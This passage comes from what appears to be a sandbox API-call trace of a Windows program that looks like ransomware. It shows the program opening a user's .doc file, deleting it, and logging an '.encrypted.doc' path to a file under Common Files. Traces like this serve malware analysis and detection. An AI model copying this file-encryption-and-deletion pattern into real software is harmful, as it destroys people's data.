HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89fa99d0, ftCreationTime.dwHighDateTime=0x1d5b7a0, ftLastAccessTime.dwLowDateTime=0x3ddb67b0, ftLastAccessTime.dwHighDateTime=0x1d5c429, ftLastWriteTime.dwLowDateTime=0x3ddb67b0, ftLastWriteTime.dwHighDateTime=0x1d5c429, nFileSizeHigh=0x0, nFileSizeLow=0x1271, dwReserved0=0x0, dwReserved1=0x777648, cFileName="guwDP36jwcK.doc", cAlternateFileName="GUWDP3~1.DOC")) returned 0x7c2240 [0034.063] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0034.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0034.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0034.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0034.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0034.063] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.063] CharLowerBuffW (in: lpsz="byte[4721]", cchLength=0xa | out: lpsz="byte[4721]") returned 0xa [0034.063] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.063] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0034.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0034.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0034.063] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.063] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0034.063] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0034.063] FreeLibrary (hLibModule=0x76b40000) returned 1 [0034.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0034.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0034.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0034.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0034.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0034.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0034.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0034.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0034.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0034.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0034.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0034.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0034.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0034.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0034.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0034.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0034.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0034.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0034.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0034.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0034.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0034.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0034.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0034.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0034.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0034.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0034.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0034.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0034.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0034.064] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.064] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.064] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.064] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0034.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0034.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0034.064] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.064] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.064] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.064] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.064] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.065] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.065] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.065] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.065] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.065] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.065] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0034.065] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.065] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.065] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.065] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.065] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.065] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0034.065] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.065] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\gtxvbfxnesrqjbx46\\guwdp36jwck.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0034.065] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0034.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0034.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0034.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0034.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0034.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0034.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0034.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0034.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0034.066] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.066] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.066] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.066] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0034.066] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.066] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.066] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.066] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.066] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.066] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.066] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.066] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.066] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0034.066] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.066] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.066] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.067] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.067] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.067] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.067] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.067] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc", lpFilePart=0x0) returned 0x79 [0034.067] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89fa99d0, ftCreationTime.dwHighDateTime=0x1d5b7a0, ftLastAccessTime.dwLowDateTime=0x3ddb67b0, ftLastAccessTime.dwHighDateTime=0x1d5c429, ftLastWriteTime.dwLowDateTime=0x1430f9a0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1271, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="guwDP36jwcK.doc", cAlternateFileName="GUWDP3~1.DOC")) returned 0x7c2240 [0034.067] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\gtxvbfxnesrqjbx46\\guwdp36jwck.doc")) returned 1 [0034.068] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89fa99d0, ftCreationTime.dwHighDateTime=0x1d5b7a0, ftLastAccessTime.dwLowDateTime=0x3ddb67b0, ftLastAccessTime.dwHighDateTime=0x1d5c429, ftLastWriteTime.dwLowDateTime=0x1430f9a0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1271, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="guwDP36jwcK.doc", cAlternateFileName="GUWDP3~1.DOC")) returned 0 [0034.068] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0034.068] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.068] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0034.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0034.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0034.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0034.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0034.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0034.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0034.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0034.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0034.069] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0034.069] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0034.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0034.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0034.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0034.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oc", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="doc", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".doc", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0034.069] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0034.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0034.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0034.069] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0034.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0034.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0034.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0034.069] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0034.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0034.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0034.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0034.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0034.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0034.070] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0034.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0034.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0034.070] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0034.070] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0034.070] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0034.070] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0034.070] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0034.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0034.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0034.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0034.070] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0034.070] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x13a7, lpOverlapped=0x0) returned 1 [0034.071] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0034.071] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x13a7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0034.071] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0034.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0034.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0034.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0034.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0034.071] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.encrypted.doc\r\n", cchWideChar=134, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 134 [0034.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x86) returned 0x7bbc00 [0034.071] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.encrypted.doc\r\n", cchWideChar=134, lpMultiByteStr=0x7bbc00, cbMultiByte=134, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.encrypted.doc\r\n", lpUsedDefaultChar=0x0) returned 134 [0034.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0034.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0034.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7bbc00 | out: hHeap=0x770000) returned 1 [0034.071] WriteFile (in: hFile=0x128, lpBuffer=0x7c38b0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7c38b0*, lpNumberOfBytesWritten=0x6aee3c*=0x85, lpOverlapped=0x0) returned 1 [0034.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0034.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0034.071] CloseHandle (hObject=0x128) returned 1 [0034.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0034.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0034.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0034.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 